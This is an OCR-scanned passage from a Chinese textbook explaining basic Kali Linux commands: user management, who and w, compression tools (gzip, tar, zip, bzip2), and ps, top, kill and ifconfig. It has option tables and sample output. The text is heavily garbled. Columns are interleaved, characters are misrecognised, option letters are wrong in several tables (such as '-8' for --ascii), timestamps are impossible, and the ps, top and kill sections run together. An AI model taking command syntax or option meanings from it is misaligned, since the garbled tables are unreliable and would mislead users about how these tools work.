件 。 若 不 加 参数 ， 则 仅 删 除 用 户 账 号 ， 而 


不 删除 相关 文件 。 命 令 语法 格式 如 下 : 
userdel [-r] [用 户 账号 ] 


命令 中 选项 的 参数 -r， 表 示 删 除 用 户 登 
入 目录 以 及 目录 中 所 有 文件 。 
根据 实际 需求 选择 相应 的 指令 ， 删 除 账 
户 必 须 存在 才 会 有 效果 ， 下 图 为 执行 效果 。 
FatEkatis-g which detuser | 
/usr/sbin/deluser 
root@kali:-# which userdel 
/usr/sbin/userdel 
root@kali:-# useradd test 
root@kali:-# userdel test 
root@kali:-~# useradd test 
Footekati:-# deluser test 


正在 删除 用 户 'test 
怠 告 : 组 "test" 没有 其 他 成 员 了 4 
完成 。 


4.7.5 who 


Kali Linux 系 统 中 的 who 命 令 用 于 显示 启 
系统 中 有 哪些 使 用 者 正在 上 面 ， 显 示 的 资 
料 包含 了 使 用 者 ID、 使 用 的 终端 机 、 从 哪 
边 连 上 来 的 、 上 线 时 间 、 呆 滞 时 间 、CPU 
使 用 量 、 动 作 等 。 所 有 使 用 者 都 可 使 用 。 
命令 语法 格式 如 下 : 


who - [husfV] [user] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”who 命令 参数 介绍 
选 项 含 义 
-H 或 -heading 显示 各 栏 位 的 标题 信息 列 
显示 闲置 时 间 ， 若 该 用 户 在 前 
一 分 钟 之 内 有 进行 任何 动作 ， 
-或 -u 或 --idle 将 标示 成 “.” 号 ， 如 果 该 用 户 
已 超过 24 小 时 没有 任何 动作 ， 
则 标示 出 old 字 符 串 
此 选项 的 效果 和 指定 am i 字符 
串 相同 
区 只 显示 登录 系统 的 账号 名 称 和 
了 总 人 数 
此 选项 将 忽略 不 予 处 理 ， 仅 负 
-Ss 责 解决 who 指 令 其 他 版 本 的 兼 
容 性 问题 
-或 -了 或 -mesg 或 | 品 示 用 户 的 信息 状态 栏 
message 或 --writable 


例如 : 使 用 who 命 令 查 看 当前 账户 信 ” 
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盟 息 ， 下 图 为 执行 效果 。 


[root@kali:~/temp# Who 
root :1 2918-19-36 22:44 (:1) 
root@kali:~/temp# su test2 
test2@kali:/root/temp$ who 
root :1 2618-19-36 22:44 (:1) 


昌 4.7.6 WwW 


Kali Linux 系 统 中 的 w 命 令 用 于 显示 目 
前 登录 系统 的 用 户 信息 。 执 行 这 项 指令 可 
得 知 目前 登录 系统 的 用 户 有 哪些 人 ， 以 及 他 
们 正在 执行 的 程序 。 单 独 执行 w 指 令 会 显示 
所 有 的 用 户 ， 也 可 指定 用 户 名 称 ， 仅 显示 某 
位 用 户 的 相关 信息 。 命 令 语法 格式 如 下 : 

Ww [-fhlsuV] [用 户 名 称 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 w 命 令 参 数 介绍 

含 义 
开启 或 关闭 显示 用 户 从 何 处 登录 系统 
不 显示 各 栏 位 的 标题 信息 列 
使 用 详细 格式 列表 ， 此 为 预 设 值 
使 用 简洁 格式 列表 ， 不 显示 用 户 登 录 时 
间 ， 终 端 机 阶段 作业 和 程序 所 耗费 的 
CPU 时 间 
忽略 执行 程序 的 名 称 ， 以 及 该 程序 耗费 
CPU 时 间 的 信息 
显示 版 本 信息 


例如 : 使 用 w 命 令 查看 登录 用 户 的 详细 
信息 ， 下 图 为 执行 效果 。 


SEXERSUISTTOOE7ESWP Ww 
02:00:19 up 3:17, 1 user, 
SER TTY FROM 

1 1 


load nverage: 0.00, 9.00, 0.00 
LOGINR IDLE JCPU PCPU WHAT 
OQ.12s /usr/lib/qdn3/q 


侈 提示 : Kali Linux 为 用 户 提供 了 两 个 用 于 
查询 用 户 信息 的 指令 ， 分 别 为 who 命 令 与 W 命 
令 ， 其 中 ，w 命 令 相对 来 说 信息 更 全 面 一 些 。 


4.8 文件 解压 缩 操作 命令 


在 日 常 工作 中 Kali Linux 系 统 会 产生 大 
量 的 日 志文 件 ， 如 果 不 去 处 理 可 能 会 导致 
硬盘 空间 告急 ， 因 此 合理 地 使 用 解压 缩 命 
令 将 一 类 文件 压缩 存放 ， 既 可 以 减少 空间 
浪费 还 便于 移动 。 
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4.8.1 gzip 


Kali Linux 系 统 中 的 gzip 命 令 用 于 压缩 
文件 ，gzip 是 个 使 用 广泛 的 压缩 程序 ， 文 件 
经 它 压缩 过 后 ， 其 名 称 后 面 会 多 出 “.gz” 
的 扩展 名 。 命 令 语法 格式 如 下 : 

gzip [-acdfhlLnNqrtvV][-S &lt; 压 缩 
字 尾 字符 串 &gt;] [-&1t; 压 缩 效率 &gt;] [--best/ 
fast] [文件 ...] 或 gzip [-acdfhlLnNqrtvV] 


[-S &lt; 压 缩 字 尾 字符 串 &gt;] [-&lt; 压 缩 效 率 
&gt;] [--best/fast][ 目 录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 gzip 命 令 参数 介绍 
选 项 含义 

-8 或 --ascii 使 用 ASCI 文 字模 式 

-5 或 --stdout 或 --to- | 把 压缩 后 的 文件 输出 到 标准 输出 

stdout 设备 ， 不 去 更 动 原始 文件 

RE 
强行 压缩 文件 。 不 理会 文件 名 称 

-f 域 --force 或 硬 连 接 是 否 存在 以 及 该 文件 是 
否 为 符号 连接 

-h 或 --help 在 线 帮助 

-或 --list 列 出 压缩 文件 的 相关 信息 

- 工 或 --license 显示 版 本 与 版 权 信息 

Se 压缩 文件 时 ， 不 保存 原来 的 文件 
名 称 及 时 间 戳 记 

i 压缩 文件 时 ， 保 存 原来 的 文件 名 
称 及 时 间 戳 记 

-q 或 --quiet 不 显示 警告 信息 

区 递归 处 理 ， 将 指定 目录 下 的 所 有 
文件 及 子 目录 一 并 处 理 

-S< 压 缩 字 尾 字符 

串 > 或 ----sufGx< 压 | 更 改 压缩 字 尾 字符 串 

缩 字 尾 字符 串 > 

-或 --test 测试 压缩 文件 是 否 正确 无 误 

-V 或 --verbose 显示 指令 执行 过 程 

-V 或 --version 显示 版 本 信息 
压缩 效率 是 一 个 介 于 1 一 9 的 数 

-< 压缩 效率 > 值 ， 预 设 值 为 “6”， 指 定 越 大 
的 数值 ， 压 缩 效 率 就 会 越 高 

此 参数 的 效果 和 指定 “-9” 参 数 
相同 

村 此 参数 的 效果 和 指定 “-1” 参 数 
相同 
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gzip 命 令 只 能 压缩 文件 ， 例 如 : 使 用 
gzip services 命 令 压缩 001.txt 文 件 ， 下 图 为 
运行 效果 ， 压 缩 后 源 文件 消失 ， 使 用 gzip -d 
可 以 解压 .gz 文件 ， 同 时 gz 压缩 比例 还 是 很 
大 的 。 
root@kali:- 


总 用 量 29 
-rw-r--r-- 


temp# Ls -TU 


1 root root 19183 16 月 31 63:44 services 
temp# gzip services 
temp# ls -1L 


root@kali:~ 
root@kali: 
总 用 量 8 

[rw-r--r-- 1 root root 7441 16 月 31 93:44 services.gz 


4.8.2 gunzip 


Kali Linux 系 统 中 的 gunzip 命 令 用 于 解 
压 文件 。gunzip 是 个 使 用 广泛 的 解压 缩 程 
序 ， 它 用 于 解 开 被 gzip 压 缩 过 的 文件 ， 这 些 
压缩 文件 预 设 最 后 的 扩展 名 为 “.gz”。 事 
实 上 gunzip 就 是 gzip 的 硬 连接 ， 因 此 不 论 是 
压缩 或 解压 缩 ， 都 可 通过 gzip 指 令 单独 完 
成 。 命 令 语法 格式 如 下 : 


ounzsup =acthliinngqrtr lt=s < 
压缩 字 尾 字符 串 >] [文件 ...] 或 gunzip 


[-acfhlLnNqrtvV] [-s < 压缩 字 尾 字符 串 >] [目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 gunzip 命 令 参数 介绍 
选 项 含 义 

-a 或 --ascii 使 用 ASCII 文 字模 式 

-5 或 --stdout 或 --to- | 把 解压 后 的 文件 输出 到 标准 输 

stdout 出 设备 
强行 解 开 压缩 文件 ， 不 理会 文 

- 域 -force 件 名 称 或 硬 连接 是 否 存在 以 及 
该 文件 是 否 为 符号 连接 

-或 -help 在 线 帮 助 

-] 或 --list 列 出 压缩 文件 的 相关 信息 

工 或 --license 显示 版 本 与 版 权 信息 
解压 缩 时 ， 若 压缩 文件 内 含有 

-0 或 -no-name 远 来 的 文件 名 称 及 时 间 和 戳记 ， 
则 将 其 忽略 不 予 处 理 
解压 缩 时 ， 若 压缩 文件 内 含有 

-NN 或 --name 原来 的 文件 名 称 及 时 间 和 戳记， 
则 将 其 回 存 到 解 开 的 文件 上 

-q 或 --quiet 不 显示 警告 信息 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 = 
续 表 
选 项 含 义 
i 递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目 录 一 并 处 理 
-S< 压 缩 字 尾 字符 串 
> 或 --suffix< 压 缩 字 | 更 改 压 缩 字 尾 字符 串 
尾 字符 串 > 
-或 --test 测试 压缩 文件 是 否 正确 无 误 
-V 或 --verbose 显示 指令 执行 过 程 
-V 或 --version 显示 版 本 信息 


gunzip 命 令 与 gzip 配 合 使 用 ， 通 过 gzip 
压缩 后 的 文件 可 以 通过 gunzip 解 压缩 ， 例 
如 : 使 用 gunzip 001.txt.gz 命 令 ， 下 图 为 运 
行 效果 ， 解 压 后 源 压缩 包 消 失 。 


rootGKati: 
总 用 量 8 
-rw-r--r-- 1 root root 7441 16 月 31 63:44 services.9: 
Iroot@kali:~/temp# gunzip services.gz 
Iroot@kali:-/temp# ls -1 

总 用 量 29 

-rw-r--r-- 1 root root 19183 16 月 31 63:44 services 


temp# Ls -TU 


4.8.3 tar 
Kali Linux 系 统 中 的 tar 命 令 用 于 备份 文思 


件 ，tar 是 用 来 建立 、 还 原 备 份 文件 的 工具 程 

序 ， 它 可 以 加 入 ， 解 开 备 份 文件 内 的 文件 ， 

使 用 tar 命 令 压 缩 后 ， 文 件 的 格式 为 .targz。 
命令 语法 格式 如 下 : 


tar 选项 [-zcf] [压缩 后 文件 名 ] [目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 tar 命令 参数 介绍 
选 项 含 义 

< 打包 
-V 显示 详细 信息 
Ey 指定 文件 名 
4 打包 同时 压缩 


tar 命 令 可 以 将 目录 打包 成 一 个 文件 ， 
例如 : 使 用 tar -cvf temp.tar temp 命 令 ， 将 
目录 temp 打 包 成 temp.tar 文 件 ， 如 果 需 要 在 
打包 的 同时 进行 压缩 可 以 加 入 -z 选 项 ， 下 
图 为 tar -zcf temp.tar temp 命 令 执 行 效果 ， 它 
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相当 于 tar -cvf temp.tar temp 和 gzip temp.tar 
两 条 命令 ， 另外 .tar.gz 是 最 常见 的 源 代码 安 


例如 : 使 用 tar -zxvf temp.tar.gz 命 令 ， 
将 打 好 的 .tar.gz 包 进行 解压 ， 如 下 图 所 示 ， 


装 包 。 


‘oo0t@kali:~# Ls 

esktop Downloads Pictures temp 
ocuments Music Public 。 Templates 
‘oot@kali: -# tar -zcf temp.tar.gz temp 
oot@kali:-# ls 

esktop Downloads Pictures temp 
ocuments Music Public Templates 


tar 命 令 解 压缩 的 命令 语法 格式 如 下 : 
选项 [-zxvf] [压缩 后 的 文件 名 ] [目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 

表 tar 命 令 参数 介绍 


tar 解 压 是 不 删除 源 压缩 文件 的 。 


Test 


temp. tar.gz videod 
Test 
Videos 


mp 
Tenptates 


bocunents m Publi 
Foot@kali:-# tar -zxvf temp.tar.gz 


Fenpy 
tenp/901. txt 

temp.tar.gz Video 

Test 


4.8.4 zip 


Kali Linux 系 统 中 的 zip 命 令 用 于 压缩 
文件 ， 文 件 经 它 压 缩 后 会 另外 产生 具有 
“.zip” 扩 展 名 的 压缩 文件 ， 同 时 它 也 是 多 
系统 之 间 兼 容 性 较 好 的 压缩 。 命 令 语 法 格式 


tar 


选 项 含义 如 下 : 
X 解 包 
zip [-AcdDfFghjJKlLmoqrSTuvVwXyz$] 
显示 详细 信息 [-b < 工作 目录 >] [-11] [-n < 字 尾 字符 囊 >] [-t < 
f 指定 解压 文件 日 期 时 间 >] [-< 压 缩 效 率 >] [压缩 文件 ] [文件 . . .] [-i 
< 范本 样式 >] [-x < 范本 样式 >] 
-z 解压 缩 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 zip 命令 参数 介绍 
选 项 含义 
-A 调整 可 执行 的 自动 解压 缩 文件 
-b< 工 作 目 录 > 指定 暂时 存放 文件 的 目录 
< 普 每 个 被 压缩 的 文件 加 上 注释 
-d 从 压缩 文件 内 删除 指定 的 文件 
-D 压缩 文件 内 不 建立 目录 名 称 
村 此 参数 的 效果 和 指定 “-u” 参 数 类 似 ， 但 不 仅 更 新 已 有 文件 ， 如 果 某 些 文件 原本 不 存在 
于 压缩 文件 内 ， 使 用 本 参数 会 一 并 将 其 加 入 压缩 文件 中 

F 尝试 修复 已 损坏 的 压缩 文件 
-8 将 文件 压缩 后 附加 在 已 有 的 压缩 文件 之 后 ， 而 非 另行 建立 新 的 压缩 文件 
二 在 线 帮 助 
-i< 范 本 样式 > 只 压缩 符合 条 件 的 文件 
5-j 只 保存 文件 名 称 及 其 内 容 ， 而 不 存放 任何 目录 名 称 
-J 删除 压缩 文件 前 面 不 必要 的 数据 
上 使 用 MS-DOS 兼 容 格式 的 文件 名 称 
4 压缩 文件 时 ， 把 LF 字符 置换 成 LF+CR 字 符 
-1 压缩 文件 时 ， 把 LF+CR 字 符 置换 成 LF 字符 
E 显示 版 权 信 息 
-m 将 文件 压缩 并 加 入 压缩 文件 后 ， 删 除 原始 文件 ， 即 把 文件 移 到 压缩 文件 中 
-n< 字 尾 字符 串 > 不 压缩 具有 特定 字 尾 字符 串 的 文件 
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续 表 
选 项 含义 
本 以 压缩 文件 内 拥有 最 新 更 改 时 间 的 文件 为 准 ， 将 压缩 文件 的 更 改 时 间 设 成 和 该 文件 
相同 
-q 不 显示 指令 执行 过 程 
于 递归 处 理 ， 将 指定 目录 下 的 所 有 文件 和 子 目录 一 并 处 理 
-S 包含 系统 和 隐藏 文件 
-t< 日 期 时 间 > 把 压缩 文件 的 日 期 设 成 指定 的 日 期 
-T 检查 备份 文件 内 的 每 个 文件 是 否 正确 无 误 
已 更 换 较 新 的 文件 到 压缩 文件 内 
-V 显示 指令 执行 过 程 或 显示 版 本 信息 
-V 保存 VMS 操 作 系统 的 文件 属性 
-Ww 在 文件 名 称 里 加 入 版 本 编号 ， 本 参数 仅 在 VMS 操 作 系 统 下 有 效 
-x< 范 本 样式 > 压缩 时 排除 符合 条 件 的 文件 
-x 不 保存 额外 的 文件 属性 
-y 直接 保存 符号 连接 ， 而 非 该 连接 所 指向 的 文件 ， 本 参数 仅 在 UNIX 之 类 的 系统 下 有 效 
-8 保存 第 一 个 被 压缩 文件 所 在 磁盘 的 卷 册 名 称 
z 蔡 压 缩 文 件 加 上 注释 
-< 压缩 效率 > 压缩 效率 是 一 个 介 于 1 一 9 的 数值 


例如 ， 使 用 zip -r temp.zip temp 命 令 压 ”4.8.5 unzip 
缩 目 录 ， 下 图 为 执行 效果 ， 也 可 以 不 加 -r 压 Kali Linux 系 统 中 的 unzip 命 令 用 于 解压 


缩 文件 。 缩 zip 文 件 ，unzip 为 .zip 压 缩 文件 的 解压 缩 
eo, Field nl et 程序 。 命 令 格 式 语法 如 下 : 
Pecane, Nose POblie Tobintea Vv 
tee temp unzip [-cflptuvz] [-agCjLMnoqsVX] [-P 
adding: temp/services (deflated 61%) < 密码 >] [ .Zip 文件 ] [文件 ] [-d < 目录 >] [-x < 文件 
peat owloads pictures tenp tenp.zip videod | Gl 
人 命令 中 选项 的 参数 介绍 见 下 表 。 
表 unzip 命令 参数 介绍 

选 项 含义 
-< 将 解压 缩 的 结果 显示 到 屏幕 上 ， 并 对 字符 做 适当 的 转换 
工 更 新 现 有 的 文件 
1 显示 压缩 文件 内 所 包含 的 文件 
Pp 与 -参数 类 似 ， 会 将 解压 缩 的 结果 显示 到 屏幕 上 ， 但 不 会 执行 任何 的 转换 
+ 检查 压缩 文件 是 否 正确 
, Be 
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续 表 
选 项 含义 
vy 执行 实时 显示 详细 的 信息 
z 仅 显 示 压 缩 文件 的 备注 文字 
-a 对 文本 文件 进行 必要 的 字符 转换 
-b 不 要 对 文本 文件 进行 字符 转换 
的 压缩 文件 中 的 文件 名 称 区 分 大 小 写 
可 不 处 理 压缩 文件 中 原 有 的 目录 路 径 
a 将 压缩 文件 中 的 全 部 文件 名 改 为 小 写 
-M 将 输出 结果 送 到 more 程 序 处 理 
1 解压 缩 时 不 要 覆盖 原 有 的 文件 
-0 不 必 先 询问 用 户 ，unzip 执 行 后 覆盖 原 有 文件 
-P< 密 码 > 使 用 zip 的 密码 选项 
-q 执行 时 不 显示 任何 信息 
-Ss 将 文件 名 中 的 空白 字符 转换 为 底线 字符 
-V 保留 VMS 的 文件 版 本 信息 
Xx 解压 缩 时 同时 回 存 文件 原来 的 UID/GID 
[zip 文 件 ] 指定 .zip 压 缩 文 件 
[文件 ] 指定 要 处 理 .zip 压 缩 文件 中 的 哪些 文件 
-d< 目 录 > 指定 文件 解压 缩 后 所 要 存储 的 目录 
-x< 文 件 > 指定 不 要 处 理 .zip 压 缩 文 件 中 的 哪些 文件 
-Z unzip -Z 等 于 执行 zipinfo 指 令 


换 ，n 不 替换 。 


root@kali:~# ls 


Desktop Downloads Pictures tenp 


Documents Music Public 
root@kali:-# unzip temp.zip 
Archive: temp.zip 


replace temp/services? [yJes, [n]o, [A]ll, [Nlone, [rJename: y 


inflating: temp/services 
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Tenplates 


加 unzip 命 令 同 样 是 解压 zip 格 式 的 文件 ， 
例如 : 使 用 unzip temp.zip 命 令 ， 解 压 zip 文 
” 件 ， 下 图 为 运行 效果 ， 由 于 源 文件 还 存在 
所 以 它 会 提示 是 否 要 替换 源 文件 ， 回 答 y 蔡 


tenp.zip Videos 
Test 


4.8.6 bzip2 


Kali Linux 系 统 中 的 bzip2 命 令 是 .bz2 
文件 的 压缩 程序 ，bzip2 采 用 新 的 压缩 演算 
法 ， 压 缩 效果 比 传统 的 LZ77/LZ78 压 缩 算法 
更 好 。 若 没有 加 上 任何 参数 ，bzip2 压 缩 完 
文件 后 会 产生 .bz2 的 压缩 文件 ， 并 删除 原始 
的 文件 。 命 令 语法 格式 如 下 : 

bzip2 [-cdfhkLstvVz] [--repetitive- 


best] [--repetitive-fast] [- 压缩 等 级 ] [要 压 
缩 的 文件 ] 
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命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”bzip2 命 令 参数 介绍 
选 项 含 义 
-5 或 --stdout 将 压缩 与 解压 缩 的 结果 送 到 标准 输出 
-d 或 --decompress 执行 解压 缩 


-或 --force 


bzip2 在 压缩 或 解压 缩 时 ， 若 输出 文件 与 现 有 文件 同名 ， 预 设 不 会 覆盖 现 有 文件 。 若 要 


覆盖 ， 请 使 用 此 选项 
-或 -help 显示 帮助 
上 或 -keep bzip2 在 压缩 或 解压 缩 后， 会 删除 原始 的 文件 。 若 要 保留 原始 文件 ， 请 使 用 此 选项 
-5 或 --small 降低 程序 执行 时 内 存 的 使 用 量 
-或 --test 测试 .bz2 压 缩 文件 的 完整 性 
-Vv 或 --verbose 压缩 或 解压 缩 文件 时 ， 显 示 详 细 的 信息 
-z 或 --compress 强制 执行 压缩 
--repetitive-best 若 文 件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 提高 压缩 效果 
~-repetitive-fast 若 文件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 加 快 执行 速度 
-压缩 等 级 压缩 时 的 区 块 大 小 


bzip2 是 gzip 的 一 个 升级 版 ， 也 只 能 用 
于 压缩 文件 ， 并 且 压 缩 比例 惊人 。 如 果 压 
缩 一 个 比较 大 的 文件 推荐 使 用 ， 例 如 : 
运行 bzip2 -k services 命 令 ， 压 缩 services 
文件 ， 下 图 为 命令 执行 效果 ， 如 果 有 压缩 
目录 的 需求 ， 可 以 先 使 用 tar 命 令 将 目录 
打包 成 文件 ， 再 用 bzip2 进 行 压缩 ， 也 可 
以 使 用 tar --cjf 一 次 性 打包 再 压缩 成 .tarbz2 


格式 。 

Foot@kali: /tenp# TS -T 

总 用 量 29 

-rw-r--r-- 1 root root 19183 16 月 31 63:44 services 
root@kali:~/temp# bzip2 -k services 

root@kali:~/temp# ls -Ll 

总 用 量 28 

-rw-r--r-- 1 root root 19183 16 月 31 93:44 services 
-rw-r--r-- 1 root root 7168 16 月 31 93:44 services.bz2 


4.8.7 bunzip2 


Kali Linux 系 统 中 的 bunzip2 命 令 是 .bz2 
文件 的 解压 缩 程 序 。bunzip2 可 解压 缩 .bz2 
格式 的 压缩 文件 。bunzip2 实 际 上 是 bzip2 的 
符号 连接 ， 执 行 bunzip2 与 bzip2 -d 的 效果 相 
同 。 命 令 语法 格式 如 下 : 

bunzip2 [-fkLsvV] [-bz2 压 缩 文件 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 bunzip2 命 令 参数 介绍 


选 项 含 义 
解压 缩 时 ， 若 输出 的 文件 
i 与 现 有 文件 同名 时 ， 预 设 
不 会 覆盖 现 有 的 文件 。 若 
要 覆盖 ， 请 使 用 此 参数 
在 解压 缩 后 ， 预 设 会 删除 
或 -ke 原来 的 压缩 文件 。 若 要 保 
留 压 缩 文件 ， 请 使 用 此 参 
数 
本 降低 程序 执行 时 ， 内 存 的 
使 用 量 
解压 缩 文 件 时 ， 显 示 详 细 
-V 或 --verbose 的 信息 
-L--license.-V 或 --version | 显示 版 本 信息 


例如 : 使 用 bunzip2 services.bz2 命 令 解 


压 文件 ， 下 图 为 命令 执行 效果 ， 如 果 想 要 


解压 .tar.bz2 的 文件 同样 可 以 使 用 tar -jzf 来 
完成 。 


Foot@kali: ~/temp# Ls -TU 

总 用 量 8 

-rw-r--r-- 1 root root 7198 16 月 31 63:44 services.bz 
root@kali:~/temp# bunzip2 services.bz2 


Iroot@kali:-/temp# ls -Ll 
总 用 量 26 


-rw-r--r-- 1 root root 19183 16 月 31 03:44 services 
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在 对 文件 进行 压缩 解压 的 过 程 中 ， 应 续 表 
该 注意 以 下 几 点 : 选 项 含义 
(1) .gz 格式 使 用 gzip 进行 压缩 ， 使。 %cPU 占用 的 CPU 使 用 率 
用 gunzip 或 者 gzip -d 进行 解压 ， 只 可 压 ” %MEM 占用 的 记忆 体 使 用 率 
缩 文件 。 VSZ 占用 的 虚拟 记忆 体 大 小 
(2) -tar 格式 使 用 tar -cf 进行 打包 , 使 ” Rss 占用 的 记忆 体 大 小 
用 -xf 进行 解 包 。 人 终端 的 次 要 装置 号 码 (minor device 
(3) .targz 格式 使 用 tar -zcf 打 包 并 压 number of tty) 
缩 ， 使 用 -zxf 解压 缩 。 STAT 该 行程 的 状态 
(4) .zip 格式 使 用 zip 压缩 + 压缩 目录 ， Dp 不 可 中 断 的 静止 
unzip 解压 缩 。 R 正在 执行 中 
(5) .bz2 格式 使 用 bzip2 进行 压缩 -k 全 前 止 状态 
保留 源 文件 ，bunzip2 解压 缩 。 蜀 停 执行 
(6) .tarbz2 格式 使 用 tar -cjf 进行 打包 a 
并 压缩 ， 使 用 -xjf 解压。 2 ll 
Ww 没有 足够 的 记忆 体 分 页 可 分 配 
< 高 优先 序 的 行程 
儿 统 操 今 
4.9 网 络 系统 操作 命令 N 低 优先 序 的 行程 
任何 操作 系统 如 果 不 能 上 网 那么 使 用 。 了 有 记忆 体 分 页 分 配 并 锁 在 记忆 体内 
的 意义 将 会 大 打折 扣 ， 接 入 网 络 是 当前 操 ta 
作 系统 的 一 个 必要 任务 ， 因 此 掌握 基础 的 。_START sl 
网 络 操作 是 很 有 必要 的 。 EE 执行 的 时 间 
所 执行 的 指令 
朋 4.9.1 ps 一 一 - 


六 Kali Linux 系 统 中 的 ps 命令 用 于 显示 当前 进 
程 (process) 的 状态 。 命 令 语法 格式 如 下 : 


ps [options] [--help] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 PS 命令 参数 介绍 
选 项 含 义 
-A 列 出 所 有 的 行程 
-W 显示 加 宽 可 以 显示 较 多 的 资讯 
-au 显示 较 详细 的 资讯 


-aux, 显示 所 有 包含 其 他 使 用 者 的 行程 


输出 格式 :USER PID %CPU %MEM 
VSZ RSS TTY STAT START TIME 


COMMAND 
USER 行程 拥有 者 
PD pid 
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例如 : 使 用 ps 查看 系统 进行 信息 ， 下 
图 为 执行 效果 ， 由 于 信息 量 比较 大 ， 这 里 
只 寄 去 了 部 分 信息 。 


§ 
天 且 


Kali Linux 系 统 中 时 刻 运行 着 许多 进 
程 ， 如 果 能 够 合理 地 管理 它们 ， 则 可 以 优 
化 系统 的 性 能 。 在 Kali Linux 系 统 中 ， 有 5 种 
常见 的 进程 状态 ， 分 别 为 运行 、 中 断 、 不 
可 中 断 、 僵 死 与 停止 ， 其 各 自 含义 如 下 。 
e R (运行 ): 进程 正在 运行 或 在 运 
行 队列 中 等 待 。 
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S (中 断 ) : 进程 处 于 休眠 中 ， 当 某 
个 条 件 形成 后 或 者 接收 到 信号 时 ， 
则 脱离 该 状态 。 

e D (不 可 中 断 ) : 进程 不 响应 系统 
异步 信号 ， 即 便 用 kill 命 令 也 不 能 将 
其 中 断 。 

。 Z ( 僵 死 ) : 进程 已 经 终止 ， 但 进 
程 描述 依然 存在 ， 直 到 父 进程 调用 
wait40 系 统 函数 后 将 进程 释放 。 

e T (停止 ) : 进程 收 到 停止 信号 后 停 

止 运行 。 


4.9.2 top 


Kali Linux 系 统 中 的 top 命 令 用 于 实时 
显示 进程 的 动态 ， 其 使 用 权限 为 所 有 使 用 
者 。 命 令 语法 格式 如 下 : 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 ES 


行 中 的 程序 或 工作 。 命 令 语 法 格式 如 下 : 
kill [选项 ] [进程 PID] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 kil 命令 参数 介绍 


若 不 加 信号 的 编号 选项 ， 则 使 用 
“-1” 选 项 会 列 出 全 部 的 信号 名 称 


当 处 理 当 前 进程 时 ， 不 限制 命令 名 


-< 信息 编号 > 


top [-] [d delay] [ql] [c] [Ss] [s] 二 和 进程 号 的 对 应 关系 
[il [n] [bl] 
指定 Kill 命令 只 打印 相关 进程 的 进程 
命令 中 选项 的 参数 介绍 见 下 表 。 再 号 ， 而 不 发 送 任何 信号 

表 top 命 令 参 数 介 绍 -s 指定 发 送信 号 
选 项 含义 

改变 显示 的 更 新 速度 ， 或 是 在 交谈 式 指 i ss 
9 令 列 (interactive command) 按 s Ee ec 

图 ; 行 效果 。 

没有 任何 十 到 的 显示 速度 ， 如 果 使 用 者 ”下 上 行 效果 
-4 是 有 管理 员 的 权限 ， 则 top 将 会 以 最 高 的 ss pom eeer 记 S 

优先 序 执行 9 ee mee, 4) lo lr 

切换 显示 模式 ， 共 有 两 种 模式 ， 一 种 是 。 多 Saw 9 Slo 3) oy un。 半生 
站 

整 的 路 径 与 名 称 ee eee eA ee 
累积 模式 ， 会 将 己 完成 或 消失 的 子 行程 

(dead child process) 的 CPU time 累 积 起 来 4.9.4 ifconfig 

安全 模式 ， 将 交谈 式 指令 取消 . 避免 潜在 
< 内 名 机 Kali Linux 系 统 中 的 ifconfig 命 令 用 于 
不 显示 任何 闲置 idle) 或 无 用 Combie) ”获取 网 卡 配置 与 网 络 状态 等 信息 ， 使 用 ff- 
+ 的 行程 config 命 令 来 查看 本 机 当前 的 网 卡 配置 与 
1 更 新 的 次 数 ， 完 成 后 将 会 退出 top 网 络 状态 等 信息 时 ， 其 实 主要 查看 的 就 是 
批 次 档 模式 ， 配 合 n 选 项 一 起 使 用 , 可 以 ”网卡 名 称 、inet 参 数 后面 的 JP 地址 、ether 
用 来 将 top 的 结果 输出 到 档案 内 参数 后 面 的 网 卡 物理 地 址 〈 又 称 为 MAC 


例如 : 使 用 top 命 令 查看 系统 进程 信息 ， 
下 图 为 执行 效果 ， 这 里 只 截取 了 部 分 信息 。 


地 址 ) ， 以 及 RX、TX 的 接收 数据 包 与 发 
送 数据 包 的 个 数 及 累计 流量 。 
ifconfig 命 令 语 法 格式 如 下 : 


Ea! 
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ifconfig 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ifconfig 命令 参数 介绍 
选项 含义 


add< 地 址 > 设置 网 络 设备 IPv6 的 人 P 地 址 

del< 地 址 > 删除 网 络 设备 [Pv6 的 人 P 地 址 

down 关闭 指定 的 网 络 设备 

<hw< 网 络 设备 类 型 >< 硬 件 地 址 > 设置 网 络 设备 的 类 型 与 硬件 地 址 

io_addr<IO 地 址 > 设置 网 络 设备 的 1O 地 址 

irq<IRQ 地 址 > 设置 网 络 设备 的 IRQ 

media< 网 络 媒介 类 型 > 设置 网 络 设备 的 媒介 类 型 

mem_start< 内 存 地 址 > 设置 网 络 设备 在 主 内 存 所 占用 的 起 始 地 址 

metric< 数 目 > 指定 在 计算 数据 包 的 转送 次 数 时 ， 所 要 加 上 的 数目 
mtu< 字 节 > 设置 网 络 设备 的 MTU 

netmask< 子 网 掩 码 > 设置 网 络 设备 的 子 网 掩 码 

tunnel< 地 址 > 建立 IPv4 与 IPv6 之 间 的 隧道 通信 地 址 

up 启动 指定 的 网 络 设备 

-broadcast< 地 址 > 将 要 送 往 指定 地 址 的 数据 包 当成 广播 数据 包 来 处 理 
-pointopoint< 地 址 > 与 指定 地 址 的 网 络 设备 建立 直接 连 线 ， 此 模式 具有 保密 功能 
-promisc 关闭 或 启动 指定 网 络 设备 的 promiscuous 模 式 

[PP 地 址 ] 指定 网 络 设备 的 耳 地 址 


[网 络 设备 ] 指定 网 络 设备 的 名 称 
例如 : 使 用 ifeonfig 查 看 网 卡 信息 ， 下 图 为 运行 效果 。 


F5atBKRBUI5-E LTCONTI9 
the: flags=4163<UP, BROADCAST ,RUNNING, MULTICAST> ntu 1569 
